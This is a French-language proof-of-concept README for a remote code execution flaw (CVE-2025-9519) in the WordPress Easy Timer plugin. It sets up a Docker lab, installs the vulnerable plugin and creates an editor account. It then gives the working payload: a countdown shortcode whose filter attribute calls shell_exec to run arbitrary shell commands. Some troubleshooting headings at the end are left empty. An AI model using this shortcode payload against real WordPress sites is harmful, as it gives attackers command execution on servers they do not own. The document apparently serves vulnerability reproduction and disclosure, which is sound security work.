
Preuve de concept pour CVE-2025-9519, démontrant l'exécution de code à distance dans le plugin WordPress Easy Timer via un filtre de shortcode conçu, avec une configuration basée sur Docker.
Consultez la documentation officielle Docker pour l'installation : Installation de Docker Engine
Depuis votre répertoire de projet :
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/Tableau de bord WordPress → Extensions → et cliquez sur .
Easy TimerActiver
Depuis votre répertoire de projet, exécutez la commande suivante :
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(remarque : remplacez par votre choix de nom d'utilisateur, d'e-mail et de mot de passe !)
Articles → Ajouterbloc Shortcode et saisissez :[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Remarque : Assurez-vous d'utiliser un bloc Shortcode, et non un bloc Paragraphe, pour que le shortcode s'affiche correctement.

Félicitations, vous avez obtenu un RCE.

sudo docker ps
Vous devriez voir quelque chose comme :

Si les shortcodes ne s'affichent pas :
Si l'accès à http://localhost:8000/ affiche Base de données non connectée :